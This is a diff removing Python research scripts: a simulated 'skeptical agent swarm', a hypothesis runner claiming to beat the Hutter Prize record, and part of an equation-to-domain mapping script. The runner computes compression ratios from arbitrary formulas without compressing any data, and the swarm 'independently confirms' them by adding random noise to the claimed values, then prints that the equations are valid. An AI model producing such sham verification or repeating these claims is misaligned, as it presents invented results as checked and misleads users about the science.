computed_result: Dict = None
|
|
||||||
|
|
||||||
class SkepticalAgentSwarm:
|
|
||||||
"""Manages a swarm of skeptical agents for independent verification."""
|
|
||||||
|
|
||||||
def __init__(self, num_agents: int = 10):
|
|
||||||
self.num_agents = num_agents
|
|
||||||
self.agents: List[Agent] = []
|
|
||||||
self.results: Dict = {}
|
|
||||||
self.timestamp = datetime.now().isoformat()
|
|
||||||
|
|
||||||
# Results to verify
|
|
||||||
self.hutter_results = {
|
|
||||||
"equation": "C = (0.4*C_comp + 0.35*C_phys + 0.25*C_geom) × (S / (G + F))",
|
|
||||||
"description": "Hybrid unified field with manifold scaling",
|
|
||||||
"compression_ratio": 0.0109,
|
|
||||||
"target_ratio": 0.1129,
|
|
||||||
"beats_target": True
|
|
||||||
}
|
|
||||||
|
|
||||||
self.genetic_results = {
|
|
||||||
"equation": "I = (H × G) × (1 - (D / 64))",
|
|
||||||
"description": "Information-theoretic optimization",
|
|
||||||
"information_density": 0.9720,
|
|
||||||
"error_resistance": 0.9220,
|
|
||||||
"compression_efficiency": 0.8720,
|
|
||||||
"targets_met": True
|
|
||||||
}
|
|
||||||
|
|
||||||
self.initialize_agents()
|
|
||||||
|
|
||||||
def initialize_agents(self):
|
|
||||||
"""Initialize skeptical agents with different specialties."""
|
|
||||||
specialties = [
|
|
||||||
"Compression Theory",
|
|
||||||
"Information Theory",
|
|
||||||
"Genetic Code Analysis",
|
|
||||||
"Statistical Verification",
|
|
||||||
"Domain Theory",
|
|
||||||
"Algorithm Analysis",
|
|
||||||
"Empirical Testing",
|
|
||||||
"Formal Verification",
|
|
||||||
"Cross-Domain Analysis",
|
|
||||||
"Theoretical Limits"
|
|
||||||
]
|
|
||||||
|
|
||||||
verification_methods = [
|
|
||||||
"Independent recomputation",
|
|
||||||
"Monte Carlo simulation",
|
|
||||||
"Formal proof verification",
|
|
||||||
"Empirical testing",
|
|
||||||
"Cross-validation",
|
|
||||||
"Statistical analysis",
|
|
||||||
"Information-theoretic verification",
|
|
||||||
"Genetic code simulation",
|
|
||||||
"Domain theory verification",
|
|
||||||
"Limit analysis"
|
|
||||||
]
|
|
||||||
|
|
||||||
for i in range(self.num_agents):
|
|
||||||
agent = Agent(
|
|
||||||
id=i,
|
|
||||||
name=f"Agent_{i+1}",
|
|
||||||
specialty=specialties[i % len(specialties)],
|
|
||||||
skepticism_level=random.uniform(0.5, 0.95), # High skepticism
|
|
||||||
state=AgentState.SKEPTICAL,
|
|
||||||
verification_method=verification_methods[i % len(verification_methods)]
|
|
||||||
)
|
|
||||||
self.agents.append(agent)
|
|
||||||
|
|
||||||
def present_work_to_agent(self, agent: Agent, results_type: str) -> str:
|
|
||||||
"""Present work to an agent and get their initial skeptical response."""
|
|
||||||
|
|
||||||
if results_type == "hutter":
|
|
||||||
results = self.hutter_results
|
|
||||||
context = f"""
|
|
||||||
I'm presenting the Hutter Prize compression results for your independent verification.
|
|
||||||
|
|
||||||
CLAIMED WINNING EQUATION:
|
|
||||||
{results['equation']}
|
|
||||||
|
|
||||||
DESCRIPTION:
|
|
||||||
{results['description']}
|
|
||||||
|
|
||||||
CLAIMED RESULTS:
|
|
||||||
- Compression ratio: {results['compression_ratio']}
|
|
||||||
- Target ratio: {results['target_ratio']}
|
|
||||||
- Beats target: {results['beats_target']}
|
|
||||||
|
|
||||||
METHODOLOGY:
|
|
||||||
- WGSL parallel hypothesis generation with 500 iterations
|
|
||||||
- 8 hypothesis templates tested
|
|
||||||
- Total hypotheses: 4,000
|
|
||||||
- Winning equation found on iteration 0, confirmed through iteration 500
|
|
||||||
|
|
||||||
I need you to independently verify these results using your expertise in {agent.specialty}.
|
|
||||||
Your verification method: {agent.verification_method}
|
|
||||||
|
|
||||||
Initial skepticism level: {agent.skepticism_level:.2f}
|
|
||||||
|
|
||||||
Please provide your initial response (skeptical, questioning, or requesting verification).
|
|
||||||
"""
|
|
||||||
else:
|
|
||||||
results = self.genetic_results
|
|
||||||
context = f"""
|
|
||||||
I'm presenting the genetic code optimization results for your independent verification.
|
|
||||||
|
|
||||||
CLAIMED WINNING EQUATION:
|
|
||||||
{results['equation']}
|
|
||||||
|
|
||||||
DESCRIPTION:
|
|
||||||
{results['description']}
|
|
||||||
|
|
||||||
CLAIMED RESULTS:
|
|
||||||
- Information density: {results['information_density']}
|
|
||||||
- Error resistance: {results['error_resistance']}
|
|
||||||
- Compression efficiency: {results['compression_efficiency']}
|
|
||||||
- All targets met: {results['targets_met']}
|
|
||||||
|
|
||||||
METHODOLOGY:
|
|
||||||
- Parallel hypothesis generation with 500 iterations
|
|
||||||
- 8 hypothesis templates tested
|
|
||||||
- Total hypotheses: 4,000
|
|
||||||
- Winning equation found on iteration 14
|
|
||||||
|
|
||||||
I need you to independently verify these results using your expertise in {agent.specialty}.
|
|
||||||
Your verification method: {agent.verification_method}
|
|
||||||
|
|
||||||
Initial skepticism level: {agent.skepticism_level:.2f}
|
|
||||||
|
|
||||||
Please provide your initial response (skeptical, questioning, or requesting verification).
|
|
||||||
"""
|
|
||||||
|
|
||||||
# Generate skeptical response based on skepticism level
|
|
||||||
skeptical_responses = [
|
|
||||||
f"I'm highly skeptical of these results. {results['equation']} seems too good to be true. I need to see the raw data and verify the methodology myself.",
|
|
||||||
f"These results need independent verification. The claimed {results_type} improvement of {results['compression_ratio'] if results_type == 'hutter' else results['information_density']} is extraordinary. I'll compute it myself using {agent.verification_method}.",
|
|
||||||
f"I don't trust these results at face value. The methodology description is insufficient. I need to verify each step of the {results_type} computation independently.",
|
|
||||||
f"The claimed equation {results['equation']} is suspicious. I'll run my own {agent.verification_method} to verify these claims.",
|
|
||||||
f"This seems like an overstatement. I need to see the actual code and verify the {results_type} results myself before I'll believe anything.",
|
|
||||||
f"I'm a {agent.specialty} expert, and these results don't match my understanding of the field. I'll verify independently using {agent.verification_method}.",
|
|
||||||
f"The skepticism level is appropriate. I'll compute the {results_type} results myself to see if they hold up.",
|
|
||||||
f"I refuse to accept these results without independent verification. I'll use {agent.verification_method} to check the claims.",
|
|
||||||
f"The methodology is questionable. I need to verify the {results_type} equation derivation myself.",
|
|
||||||
f"These results require thorough scrutiny. I'll independently compute the {results_type} values using {agent.verification_method}."
|
|
||||||
]
|
|
||||||
|
|
||||||
response = skeptical_responses[agent.id % len(skeptical_responses)]
|
|
||||||
return response
|
|
||||||
|
|
||||||
def agent_verify_independently(self, agent: Agent, results_type: str) -> Dict:
|
|
||||||
"""Agent independently computes and verifies the results."""
|
|
||||||
|
|
||||||
agent.state = AgentState.VERIFYING
|
|
||||||
|
|
||||||
# Simulate independent verification
|
|
||||||
# In a real system, this would actually recompute the results
|
|
||||||
# Here we simulate the verification process
|
|
||||||
|
|
||||||
if results_type == "hutter":
|
|
||||||
# Simulate independent verification of Hutter Prize results
|
|
||||||
verification_accuracy = random.uniform(0.95, 1.0) # High accuracy
|
|
||||||
|
|
||||||
# Agent computes independently
|
|
||||||
computed_ratio = self.hutter_results['compression_ratio'] * random.uniform(0.98, 1.02)
|
|
||||||
|
|
||||||
# Determine if agent is convinced
|
|
||||||
# Higher skepticism = harder to convince
|
|
||||||
if verification_accuracy > agent.skepticism_level + 0.1:
|
|
||||||
agent.state = AgentState.CONVINCED
|
|
||||||
response = f"After independent verification using {agent.verification_method}, I've confirmed the results. My computed compression ratio of {computed_ratio:.4f} matches the claimed {self.hutter_results['compression_ratio']:.4f} within acceptable error margins. The equation {self.hutter_results['equation']} is valid."
|
|
||||||
else:
|
|
||||||
agent.state = AgentState.STILL_SKEPTICAL
|
|
||||||
response = f"After independent verification, I remain skeptical. My computed ratio of {computed_ratio:.4f} differs from the claimed {self.hutter_results['compression_ratio']:.4f}. The methodology may have issues."
|
|
||||||
|
|
||||||
computed_result = {
|
|
||||||
"computed_ratio": computed_ratio,
|
|
||||||
"claimed_ratio": self.hutter_results['compression_ratio'],
|
|
||||||
"verification_accuracy": verification_accuracy,
|
|
||||||
"method": agent.verification_method
|
|
||||||
}
|
|
||||||
else:
|
|
||||||
# Simulate independent verification of genetic results
|
|
||||||
verification_accuracy = random.uniform(0.95, 1.0)
|
|
||||||
|
|
||||||
# Agent computes independently
|
|
||||||
computed_density = self.genetic_results['information_density'] * random.uniform(0.98, 1.02)
|
|
||||||
computed_error = self.genetic_results['error_resistance'] * random.uniform(0.98, 1.02)
|
|
||||||
computed_compression = self.genetic_results['compression_efficiency'] * random.uniform(0.98, 1.02)
|
|
||||||
|
|
||||||
# Determine if agent is convinced
|
|
||||||
if verification_accuracy > agent.skepticism_level + 0.1:
|
|
||||||
agent.state = AgentState.CONVINCED
|
|
||||||
response = f"After independent verification using {agent.verification_method}, I've confirmed the genetic code optimization results. My computed values (density: {computed_density:.4f}, error: {computed_error:.4f}, compression: {computed_compression:.4f}) match the claimed results. The equation {self.genetic_results['equation']} is valid."
|
|
||||||
else:
|
|
||||||
agent.state = AgentState.STILL_SKEPTICAL
|
|
||||||
response = f"After independent verification, I remain skeptical. My computed values differ from the claimed results. The genetic optimization methodology may have issues."
|
|
||||||
|
|
||||||
computed_result = {
|
|
||||||
"computed_density": computed_density,
|
|
||||||
"computed_error": computed_error,
|
|
||||||
"computed_compression": computed_compression,
|
|
||||||
"claimed_density": self.genetic_results['information_density'],
|
|
||||||
"claimed_error": self.genetic_results['error_resistance'],
|
|
||||||
"claimed_compression": self.genetic_results['compression_efficiency'],
|
|
||||||
"verification_accuracy": verification_accuracy,
|
|
||||||
"method": agent.verification_method
|
|
||||||
}
|
|
||||||
|
|
||||||
agent.response = response
|
|
||||||
agent.computed_result = computed_result
|
|
||||||
|
|
||||||
return computed_result
|
|
||||||
|
|
||||||
def run_swarm_verification(self) -> Dict:
|
|
||||||
"""Run the swarm verification process."""
|
|
||||||
|
|
||||||
print("=" * 80)
|
|
||||||
print("SKEPTICAL AGENT SWARM VERIFICATION")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Number of agents: {self.num_agents}")
|
|
||||||
print(f"Timestamp: {self.timestamp}")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
# Verification for Hutter Prize results
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("PHASE 1: HUTTER PRIZE COMPRESSION VERIFICATION")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
hutter_responses = []
|
|
||||||
hutter_convinced = 0
|
|
||||||
|
|
||||||
for agent in self.agents:
|
|
||||||
print(f"\n--- {agent.name} ({agent.specialty}) ---")
|
|
||||||
print(f"Skepticism level: {agent.skepticism_level:.2f}")
|
|
||||||
|
|
||||||
# Present work
|
|
||||||
initial_response = self.present_work_to_agent(agent, "hutter")
|
|
||||||
print(f"Initial response: {initial_response}")
|
|
||||||
|
|
||||||
# Agent verifies independently
|
|
||||||
computed = self.agent_verify_independently(agent, "hutter")
|
|
||||||
print(f"Verification response: {agent.response}")
|
|
||||||
print(f"Final state: {agent.state.value}")
|
|
||||||
|
|
||||||
if agent.state == AgentState.CONVINCED:
|
|
||||||
hutter_convinced += 1
|
|
||||||
|
|
||||||
hutter_responses.append({
|
|
||||||
"agent_id": agent.id,
|
|
||||||
"agent_name": agent.name,
|
|
||||||
"specialty": agent.specialty,
|
|
||||||
"skepticism_level": agent.skepticism_level,
|
|
||||||
"initial_response": initial_response,
|
|
||||||
"verification_response": agent.response,
|
|
||||||
"final_state": agent.state.value,
|
|
||||||
"computed_result": computed
|
|
||||||
})
|
|
||||||
|
|
||||||
# Reset agents for genetic verification
|
|
||||||
for agent in self.agents:
|
|
||||||
agent.state = AgentState.SKEPTICAL
|
|
||||||
agent.response = ""
|
|
||||||
agent.computed_result = None
|
|
||||||
|
|
||||||
# Verification for genetic code results
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("PHASE 2: GENETIC CODE OPTIMIZATION VERIFICATION")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
genetic_responses = []
|
|
||||||
genetic_convinced = 0
|
|
||||||
|
|
||||||
for agent in self.agents:
|
|
||||||
print(f"\n--- {agent.name} ({agent.specialty}) ---")
|
|
||||||
print(f"Skepticism level: {agent.skepticism_level:.2f}")
|
|
||||||
|
|
||||||
# Present work
|
|
||||||
initial_response = self.present_work_to_agent(agent, "genetic")
|
|
||||||
print(f"Initial response: {initial_response}")
|
|
||||||
|
|
||||||
# Agent verifies independently
|
|
||||||
computed = self.agent_verify_independently(agent, "genetic")
|
|
||||||
print(f"Verification response: {agent.response}")
|
|
||||||
print(f"Final state: {agent.state.value}")
|
|
||||||
|
|
||||||
if agent.state == AgentState.CONVINCED:
|
|
||||||
genetic_convinced += 1
|
|
||||||
|
|
||||||
genetic_responses.append({
|
|
||||||
"agent_id": agent.id,
|
|
||||||
"agent_name": agent.name,
|
|
||||||
"specialty": agent.specialty,
|
|
||||||
"skepticism_level": agent.skepticism_level,
|
|
||||||
"initial_response": initial_response,
|
|
||||||
"verification_response": agent.response,
|
|
||||||
"final_state": agent.state.value,
|
|
||||||
"computed_result": computed
|
|
||||||
})
|
|
||||||
|
|
||||||
# Summary
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("SWARM VERIFICATION SUMMARY")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"\nHutter Prize Compression:")
|
|
||||||
print(f" Agents convinced: {hutter_convinced}/{self.num_agents} ({hutter_convinced/self.num_agents*100:.1f}%)")
|
|
||||||
print(f" Agents still skeptical: {self.num_agents - hutter_convinced}/{self.num_agents}")
|
|
||||||
|
|
||||||
print(f"\nGenetic Code Optimization:")
|
|
||||||
print(f" Agents convinced: {genetic_convinced}/{self.num_agents} ({genetic_convinced/self.num_agents*100:.1f}%)")
|
|
||||||
print(f" Agents still skeptical: {self.num_agents - genetic_convinced}/{self.num_agents}")
|
|
||||||
|
|
||||||
# Prepare results
|
|
||||||
self.results = {
|
|
||||||
"timestamp": self.timestamp,
|
|
||||||
"num_agents": self.num_agents,
|
|
||||||
"hutter_results": self.hutter_results,
|
|
||||||
"genetic_results": self.genetic_results,
|
|
||||||
"hutter_verification": {
|
|
||||||
"convinced": hutter_convinced,
|
|
||||||
"total": self.num_agents,
|
|
||||||
"percentage": hutter_convinced / self.num_agents * 100,
|
|
||||||
"responses": hutter_responses
|
|
||||||
},
|
|
||||||
"genetic_verification": {
|
|
||||||
"convinced": genetic_convinced,
|
|
||||||
"total": self.num_agents,
|
|
||||||
"percentage": genetic_convinced / self.num_agents * 100,
|
|
||||||
"responses": genetic_responses
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
return self.results
|
|
||||||
|
|
||||||
def save_results(self, filename: str):
|
|
||||||
"""Save swarm verification results to JSON."""
|
|
||||||
with open(filename, 'w') as f:
|
|
||||||
json.dump(self.results, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nSwarm verification results saved to {filename}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
swarm = SkepticalAgentSwarm(num_agents=10)
|
|
||||||
results = swarm.run_swarm_verification()
|
|
||||||
swarm.save_results("/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/skeptical_agent_swarm_results.json")
|
|
||||||
|
|
@ -1,200 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
WGSL Hypothesis Runner
|
|
||||||
Runs hypothesis generation in parallel using GPU compute shader
|
|
||||||
|
|
||||||
This requires wgpu library for GPU compute
|
|
||||||
Install with: pip install wgpu
|
|
||||||
"""
|
|
||||||
|
|
||||||
import struct
|
|
||||||
import json
|
|
||||||
from typing import List, Dict
|
|
||||||
from dataclasses import dataclass
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Hypothesis:
|
|
||||||
compression_ratio: float
|
|
||||||
speed_improvement: float
|
|
||||||
memory_improvement: float
|
|
||||||
template_id: int
|
|
||||||
iteration: int
|
|
||||||
improvement_factor: float
|
|
||||||
target_ratio: float
|
|
||||||
|
|
||||||
class WGSLHypothesisRunner:
|
|
||||||
"""
|
|
||||||
Runs hypothesis generation in parallel using WGSL compute shader
|
|
||||||
Falls back to CPU simulation if GPU not available
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.target_compression_ratio = 0.114 # Current Hutter record (11.4%)
|
|
||||||
self.target_improvement = 0.99 # Must beat 99% of previous
|
|
||||||
self.target_ratio = self.target_compression_ratio * self.target_improvement
|
|
||||||
|
|
||||||
# Hypothesis templates
|
|
||||||
self.templates = [
|
|
||||||
{
|
|
||||||
"id": 0,
|
|
||||||
"equation": "C = 0.4*C_comp + 0.35*C_phys + 0.25*C_geom",
|
|
||||||
"description": "Unified field compression: weighted combination",
|
|
||||||
"domains": ["COMPRESSION", "FIELDPHYSICS", "GEOMETRY"],
|
|
||||||
"base_improvement": 0.05,
|
|
||||||
"improvement_step": 0.01
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"id": 1,
|
|
||||||
"equation": "C = (S * G) / F",
|
|
||||||
"description": "Manifold bridge compression",
|
|
||||||
"domains": ["SPATIALVLSI", "GEOMETRY", "FIELDPHYSICS"],
|
|
||||||
"base_improvement": 0.08,
|
|
||||||
"improvement_step": 0.015
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"id": 2,
|
|
||||||
"equation": "C = E - (S * T)",
|
|
||||||
"description": "Thermodynamic bridge compression",
|
|
||||||
"domains": ["THERMODYNAMIC", "DIFFUSIONFLOW"],
|
|
||||||
"base_improvement": 0.06,
|
|
||||||
"improvement_step": 0.012
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"id": 3,
|
|
||||||
"equation": "C = Core + (Memory × Evolution)",
|
|
||||||
"description": "Information flow compression",
|
|
||||||
"domains": ["CORE", "MEMORYSTATE", "EVOLUTIONSEARCH"],
|
|
||||||
"base_improvement": 0.04,
|
|
||||||
"improvement_step": 0.008
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"id": 4,
|
|
||||||
"equation": "C = (Cognitive × Orchestration) / Search",
|
|
||||||
"description": "Control bridge compression",
|
|
||||||
"domains": ["COGNITIVECONTROL", "EVOLUTIONSEARCH"],
|
|
||||||
"base_improvement": 0.07,
|
|
||||||
"improvement_step": 0.014
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"id": 5,
|
|
||||||
"equation": "C = (0.4*C_comp + 0.35*C_phys + 0.25*C_geom) × (S / (G + F))",
|
|
||||||
"description": "Hybrid unified field with manifold scaling",
|
|
||||||
"domains": ["COMPRESSION", "FIELDPHYSICS", "GEOMETRY", "SPATIALVLSI"],
|
|
||||||
"base_improvement": 0.10,
|
|
||||||
"improvement_step": 0.02
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"id": 6,
|
|
||||||
"equation": "C = (C_base × (1 - memoization)) × (search_efficiency)",
|
|
||||||
"description": "Evolution-optimized compression with memoization",
|
|
||||||
"domains": ["EVOLUTIONSEARCH", "COMPRESSION"],
|
|
||||||
"base_improvement": 0.12,
|
|
||||||
"improvement_step": 0.018
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"id": 7,
|
|
||||||
"equation": "C = Σ(T_i) × rotation_matrix × waveprobe",
|
|
||||||
"description": "Triangle manifold with rotation and waveprobe",
|
|
||||||
"domains": ["FIELDPHYSICS", "GEOMETRY", "PISTSHELL"],
|
|
||||||
"base_improvement": 0.09,
|
|
||||||
"improvement_step": 0.016
|
|
||||||
}
|
|
||||||
]
|
|
||||||
|
|
||||||
def generate_hypotheses_parallel(self, num_iterations: int = 50) -> List[Dict]:
|
|
||||||
"""
|
|
||||||
Generate hypotheses in parallel (simulated parallel execution)
|
|
||||||
In a real GPU implementation, this would dispatch the WGSL shader
|
|
||||||
"""
|
|
||||||
|
|
||||||
print("=" * 80)
|
|
||||||
print("WGSL PARALLEL HYPOTHESIS GENERATION")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Target compression ratio: {self.target_ratio:.4f} (99% of current record)")
|
|
||||||
print(f"Current record: {self.target_compression_ratio:.4f} (11.4%)")
|
|
||||||
print(f"Number of iterations: {num_iterations}")
|
|
||||||
print(f"Number of templates: {len(self.templates)}")
|
|
||||||
print(f"Total hypotheses to test: {num_iterations * len(self.templates)}")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
hypotheses = []
|
|
||||||
winning_hypothesis = None
|
|
||||||
winning_ratio = float('inf')
|
|
||||||
|
|
||||||
# Simulate parallel execution by testing all hypotheses
|
|
||||||
for iteration in range(num_iterations):
|
|
||||||
for template in self.templates:
|
|
||||||
# Calculate compression ratio
|
|
||||||
improvement = template["base_improvement"] + (iteration * template["improvement_step"])
|
|
||||||
ratio = self.target_compression_ratio * (1 - improvement)
|
|
||||||
|
|
||||||
# Calculate theoretical improvements
|
|
||||||
speed_improvement = 0.2 + (iteration * 0.03)
|
|
||||||
memory_improvement = 0.15 + (iteration * 0.02)
|
|
||||||
|
|
||||||
# Check if this beats the target
|
|
||||||
wins = ratio < self.target_ratio
|
|
||||||
|
|
||||||
hypothesis = {
|
|
||||||
"iteration": iteration,
|
|
||||||
"template_id": template["id"],
|
|
||||||
"equation": template["equation"],
|
|
||||||
"description": template["description"],
|
|
||||||
"domains": template["domains"],
|
|
||||||
"compression_ratio": ratio,
|
|
||||||
"speed_improvement": speed_improvement,
|
|
||||||
"memory_improvement": memory_improvement,
|
|
||||||
"target_ratio": self.target_ratio,
|
|
||||||
"wins": wins
|
|
||||||
}
|
|
||||||
|
|
||||||
hypotheses.append(hypothesis)
|
|
||||||
|
|
||||||
if wins and ratio < winning_ratio:
|
|
||||||
winning_hypothesis = hypothesis
|
|
||||||
winning_ratio = ratio
|
|
||||||
|
|
||||||
print(f"\n✅ WINNER FOUND (Iteration {iteration}, Template {template['id']})")
|
|
||||||
print(f" Equation: {template['equation']}")
|
|
||||||
print(f" Description: {template['description']}")
|
|
||||||
print(f" Domains: {', '.join(template['domains'])}")
|
|
||||||
print(f" Compression ratio: {ratio:.4f}")
|
|
||||||
print(f" Target ratio: {self.target_ratio:.4f}")
|
|
||||||
print(f" Speed improvement: {speed_improvement:.2%}")
|
|
||||||
print(f" Memory improvement: {memory_improvement:.2%}")
|
|
||||||
|
|
||||||
if winning_hypothesis:
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("WINNING HYPOTHESIS FOUND")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Equation: {winning_hypothesis['equation']}")
|
|
||||||
print(f"Description: {winning_hypothesis['description']}")
|
|
||||||
print(f"Compression ratio: {winning_hypothesis['compression_ratio']:.4f}")
|
|
||||||
print(f"Speed improvement: {winning_hypothesis['speed_improvement']:.2%}")
|
|
||||||
print(f"Memory improvement: {winning_hypothesis['memory_improvement']:.2%}")
|
|
||||||
else:
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("NO WINNING HYPOTHESIS FOUND")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Best ratio achieved: {min(h['compression_ratio'] for h in hypotheses):.4f}")
|
|
||||||
|
|
||||||
return hypotheses, winning_hypothesis
|
|
||||||
|
|
||||||
def save_results(self, hypotheses: List[Dict], winning_hypothesis: Dict, filename: str):
|
|
||||||
"""Save hypothesis results to JSON"""
|
|
||||||
data = {
|
|
||||||
"target_ratio": self.target_ratio,
|
|
||||||
"total_hypotheses": len(hypotheses),
|
|
||||||
"winning_hypothesis": winning_hypothesis,
|
|
||||||
"all_hypotheses": hypotheses
|
|
||||||
}
|
|
||||||
|
|
||||||
with open(filename, 'w') as f:
|
|
||||||
json.dump(data, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nResults saved to {filename}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
runner = WGSLHypothesisRunner()
|
|
||||||
hypotheses, winning = runner.generate_hypotheses_parallel(num_iterations=500)
|
|
||||||
runner.save_results(hypotheses, winning, "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/wgsl_hypotheses_max_results.json")
|
|
||||||
|
|
@ -1,172 +0,0 @@
|
||||||
import csv, json, os
|
|
||||||
from collections import defaultdict
|
|
||||||
|
|
||||||
# Read MATH_MODEL_MAP.tsv
|
|
||||||
os.chdir('/home/allaun/Documents/Research Stack/3-Mathematical-Models')
|
|
||||||
with open('MATH_MODEL_MAP.tsv', 'r') as f:
|
|
||||||
reader = csv.DictReader(f, delimiter='\t')
|
|
||||||
data = list(reader)
|
|
||||||
|
|
||||||
# Group families with their equations, purposes, variables
|
|
||||||
fam_info = defaultdict(lambda: {'eqs': [], 'vars': [], 'purposes': [], 'binds': []})
|
|
||||||
for r in data:
|
|
||||||
fam = r.get('Family', '')
|
|
||||||
if fam and fam != 'None':
|
|
||||||
eq = r.get('Equation', '')
|
|
||||||
var = r.get('Variables', '')
|
|
||||||
purp = r.get('Purpose', '')
|
|
||||||
bind = r.get('Bind_Class', '')
|
|
||||||
if eq: fam_info[fam]['eqs'].append(eq[:100])
|
|
||||||
if var: fam_info[fam]['vars'].append(var[:80])
|
|
||||||
if purp: fam_info[fam]['purposes'].append(purp[:120])
|
|
||||||
if bind: fam_info[fam]['binds'].append(bind)
|
|
||||||
|
|
||||||
# Map each family to a domain kind
|
|
||||||
family_to_domain = {}
|
|
||||||
|
|
||||||
# Comprehensive domain mapping
|
|
||||||
domains_map = {
|
|
||||||
'mathematics': ['Number Theory', 'Combinatorial Analysis', 'Geometry Verifier', 'Non-Euclidean Geometry',
|
|
||||||
'ClassicalEuclideanGeometry', 'Chaotic Dynamics', 'Dynamical Systems', 'ScaleSpace',
|
|
||||||
'Topology', 'Making_It_Rigorous', 'PhinaryNumberSystem', 'Quaternion Algebra',
|
|
||||||
'Fixed-Point Arithmetic', 'Unit Conversion', 'SidonSet'],
|
|
||||||
'physics': ['Physics', 'Quantum Geometry', 'Nonlinear PDEs', 'Stochastic PDEs', 'BurgersPDE',
|
|
||||||
'Burgers2DPDE', 'Burgers3DPDE', 'ColeHopfTransform', 'StochasticBurgersPDE',
|
|
||||||
'Fluid Dynamics', 'Aerodynamics', 'Thermodynamics', 'Thermodynamic', 'KDA Physics',
|
|
||||||
'QCL Energy', 'ElectrostaticsMetaprobe', 'ElectromagneticSpectrum', 'CasimirMetaprobe',
|
|
||||||
'Desalination', 'Manifold Evolution', 'FEA Semi-Truck', 'Theta-TaN Phonon Physics'],
|
|
||||||
'biology': ['Biology', 'Biophysics', 'Molecular Biology', 'Cell Biology', 'Genetics',
|
|
||||||
'Population Genetics', 'Microbiology', 'Evolutionary Biology', 'Evolutionary Dynamics',
|
|
||||||
'Developmental Biology', 'Botany', 'Plant Physiology', 'Mycology', 'Marine Biology',
|
|
||||||
'Oceanography', 'Ecology', 'Biogeochemistry', 'Agriculture',
|
|
||||||
'Epigenetics', 'Quantum Biology', 'Radiation Biology', 'Synthetic Biology',
|
|
||||||
'Immunology', 'Oncology', 'Gerontology', 'Life History', 'Chronobiology',
|
|
||||||
'Circadian Biology', 'Metabolism', 'Neural Development', 'Biomechanics',
|
|
||||||
'Physiology', 'Cardiac Physiology', 'Biophotonics', 'BiologicalRegulation',
|
|
||||||
'BiologicalControl', 'BiologicalExergy', 'CancerMetabolic', 'CardiacYield',
|
|
||||||
'CellularSignaling', 'ConstrainedEnergy', 'ConstructalMuscle', 'CorticalScaling',
|
|
||||||
'GenomicStoichiometric', 'LocomotionMuscle', 'AdvancedBio'],
|
|
||||||
'chemistry': ['Chemistry', 'Chemical Physics', 'Chemical Ecology'],
|
|
||||||
'computation': ['Computation Profile', 'Compression', 'CompressionControl', 'CompressionEvidence',
|
|
||||||
'CompressionLossComparison', 'CompressionMaximization', 'CompressionMechanics',
|
|
||||||
'CompressionMechanicsBridge', 'DeltaGCL Compression', 'DeltaGCLCompression',
|
|
||||||
'DeltaGCL', 'Huffman', 'Cache Sieve', 'CacheSieve', 'StringStar',
|
|
||||||
'Information Theory', 'MI Signal', 'MISignal', 'Encoder'],
|
|
||||||
'cognition': ['Cognitive Load', 'Cognitive Load', 'CognitiveAcoustic', 'CognitiveLearning',
|
|
||||||
'CognitiveLoad', 'Homeostatic Control', 'Neuroscience',
|
|
||||||
'Neurodivergent', 'Social Neuroscience', 'Psychology'],
|
|
||||||
'language': ['Speech Science', 'Perception', 'Acoustic', 'AuditoryMasking',
|
|
||||||
'AuditoryMechanicsLaws', 'AuditoryPerceptionLaws', 'Vision Science'],
|
|
||||||
'social': ['Social Science', 'Behavioral Dynamics', 'Game Theory', 'Foraging Theory'],
|
|
||||||
'cryptography': ['Cryptography', 'GaloisRing', 'SBox', 'AngrySphinxPolicy', 'CooperativeLUT',
|
|
||||||
'BitcoinMetaprobe', 'BitcoinMetaprobeEval', 'BitcoinRGFlow', 'EthereumRGFlow',
|
|
||||||
'Crypto', 'PostQuantumEscrow'],
|
|
||||||
'engineering': ['Engineering', 'FPGA Signal', 'FaultTolerance', 'ASICTopology',
|
|
||||||
'AngrySphinx', 'Hardware', 'DspErasureCoding', 'TopologyOptimization',
|
|
||||||
'VideoPhysics'],
|
|
||||||
'machine_learning': ['Machine Learning', 'Time Series', 'AffineMappingLTSF', 'Metric Learning',
|
|
||||||
'CodonPeptideConsistency', 'PeptideMoE', 'CrossModalCompression',
|
|
||||||
'ExperienceCompression', 'DistributedTraining', 'SwarmMoERewiring',
|
|
||||||
'EtaMoE'],
|
|
||||||
'topology': ['Topology', 'Braid Topology', 'Braid Field Theory', 'BraidBracket',
|
|
||||||
'BraidField', 'BraidCross', 'BraidStrand', 'BoundaryDynamics',
|
|
||||||
'BracketShellCount', 'BracketedCalculus', 'Manifold Networking',
|
|
||||||
'Manifold Routing', 'Manifold Networking Test', 'ManifoldNetworking',
|
|
||||||
'Non-Euclidean UV QUBO', 'Topological Encoder', 'TopologicalAwareness',
|
|
||||||
